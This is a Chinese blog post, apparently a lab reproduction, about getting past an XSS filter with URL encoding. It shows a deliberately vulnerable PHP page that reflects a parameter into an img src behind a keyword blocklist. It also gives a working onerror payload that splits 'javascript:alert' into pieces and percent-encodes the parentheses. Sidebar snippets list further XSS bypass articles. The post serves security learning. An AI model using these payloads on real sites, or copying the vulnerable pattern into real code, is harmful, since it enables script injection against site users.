urlcode编码绕过xss限制

已于 2023-03-01 17:54:47 修改
阅读量277 收藏
点赞数
分类专栏: 网络安全 文章标签: xss php 前端
于 2023-03-01 15:14:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64311421/article/details/129281451
版权

GET传递的参数直接输出在src中会存在反射型xss漏洞,本次复现的目的是利用url编码规则构造url绕过xss限制。

UrlEncode编码规则:将需要转码的字符的ASCII码值转为16进制,然后从右到左,取4位(不足4位直接处理),每2位做一位,前面加上%,编码成%XY格式。

源代码:

<?php
    header('X-SS-Protection:0');
    $xss = isset($_GET['xss'])?$_GET['xss']:'';

    $xss = str_replace(array("(",")","&","\\","<",">","'"),'',$xss);
    if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/',$xss)){
        exit('bad');
    }
    echo "<img src=\"{$xss}\">"
?>

通过分析源代码可知屏幕上打印图片路径来自于GET传递的参数,同时会将接收到参数中的()$<>'等字符均会被替换为空格。<>被过滤,闭合标签写入新标签不可行;&被过滤,对script、alert的关键字限制使用,&#的HTML实体编码不可行,因此使用url编码。
其次是关键词检测,可以将语句拆分成多个不含敏感词的子串传入,再通过location进行连接。

实现:
img标签的注入有很多方式,这里我是用onerror。
首次注入:

xss=aa" οnerrοr=location="javas"+"cript:a"+"lert(1)

失败
进行URLCode转码

xss=aa" οnerrοr=location="javas"%2B"cript:a"%2B"lert%25281%2529

成功
在这里插入图片描述

流年ꦿ
关注
专栏目录
第04篇:XSS三重URL编码绕过实例1
08-03
本文主要探讨了一个XSS三重URL编码绕过的实例,揭示了在某些情况下,简单的防御措施可能不足以阻止攻击。 首先,我们要理解XSS的基本概念。XSS攻击通常发生在Web应用程序未能正确过滤或转义用户输入的情况下。当...
XSS攻击原理和解决方法
yy1715713348的博客
06-29 2737
XSS攻击原理和解决方法
什么是URL/URL编码绕过
好好睡觉
11-07 2214
URLURL绕过
编码 urlencode utf-8编码转换
qq_42015021的博客
03-30 2194
由于sdkParam的数据以utf-8数据显示时,会包括"&“与”=",与payInfo中存储数据的格式冲突。所以服务端传输sdkParam时,采用urlEncode编码方式,客户端收到sdkParam数据时,需要对此数据进行转码 urlEncode -> utf-8。
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
白帽黑客八哥的博客
12-12 6828
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 5247
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
XSS三重URL编码绕过实例.pdf
最新发布
04-22
### XSS三重URL编码绕过实例解析 #### 一、跨站脚本攻击(XSS)简介 跨站脚本攻击(Cross Site Scripting),简称XSS,是一种常见的网络安全威胁,它利用目标网站的信任关系向用户注入恶意脚本。攻击者通过在网页中...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
关于URL的转码与解码
qq_42931285的博客
03-05 5981
URL中本身是不允许出现中文字符及特殊字符的,但有时我们还需要用到中文字符以及特殊字符,此时就需要对URL进行转码 转码使用: uncodeURIComponent(code) code:要转码的中文字符 返回值就是转码之后的字符。 解码的使用: decodeURIComponent(code) code:要解码的中文字符 返回值就是转码之后的字符。 注:使用场景: 在页面跳转传参时可能会用到。 ...
XSS解决方案(以及前端UrlEncode 加密两次的原理分析);附代码
qq_32649889的博客
11-07 2923
**XSSFilter.java** package com.sfpay.scfp.oms.app.filter;import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; import javax.servl
萌新网安路之XSS漏洞(day2)
qq_59201520的博客
02-24 189
XSS漏洞的基础知识点
URLEncode原理(全网详解)
MrWangisgoodboy的博客
04-14 1万+
URL是为了 统一的命名网络中的一个资源(URL不是单单为了HTTP协议而定义的,而是网络上的所有的协议都可以使用)
深入讲解XSS利用编码绕过的原理
<XiaoHai>的博客
08-17 1955
xss
[ 常见漏洞篇 ]常见web漏洞总结------XSS绕过方式
qq_51577576的博客
12-06 4026
本文具体写到了常见的XSS绕过方式,间的的介绍了一下修复方式 写的比较细,比较深,需要一定的基础才能看懂,仔细读完 不懂的可以百度查一查或者私信我,相信会有很大收获 目录 一、Xss绕过方式: 1. 前端过滤 2.双写绕过 3. 事件绕过 4. 大小写绕过 5. 注释干扰绕过 6.伪协议绕过 7.空格回车Tab绕过 8. 编码绕过 1. base64编码: 2. JS编码: 3. 十六进制: 4. unicode: 5. HTML实体编码: 6. URL...
[安全]复现urlcode编码绕过xss限制两个demo
紫洋的博客
11-16 810
题目利用replace函数将常见的"(",")","&","\\","","'"都替换成了空格符号,而想进行弹窗操作需要利用到onerror="alert(xxx)"函数。我们可以利用URLcode编码将括号转变为%28和%29,而URLcode编码会自动将%28和%29识别为括号,又会被限制,我们可以将%转换为相应的%25。而这时浏览器并未将%28和%29识别过来,原因是onerror函数为一个JS函数,在JS中是不允许编码符号的,就是在onerror内部不允许进行符号的编码
XSS编码绕过和防御
热门推荐
weixin_50464560的博客
05-07 1万+
第一部分:常用JS测试语句小结 1.0 常用测试语句说明 <script>alert(1)</script>        //这里alert(1)只是为了简单明了,当然可以弹出cookie.把1换成document.cookie即可.<script src=x οnerrοr=alert(1)></script>   //引入x,由于x不存在,触发onerror函数,进行弹框<script src='h
Python实现Unicode绕过XSS防御:实战教程
本章节专注于第十六节“unicode绕过过滤触发XSS-01”在Web攻防训练营中的讲解,主要讨论的是如何利用Unicode字符编码XSS(跨站脚本攻击)防御机制中实施巧妙的绕过策略。Unicode是一种广泛应用于计算机科学的标准...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流年ꦿ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值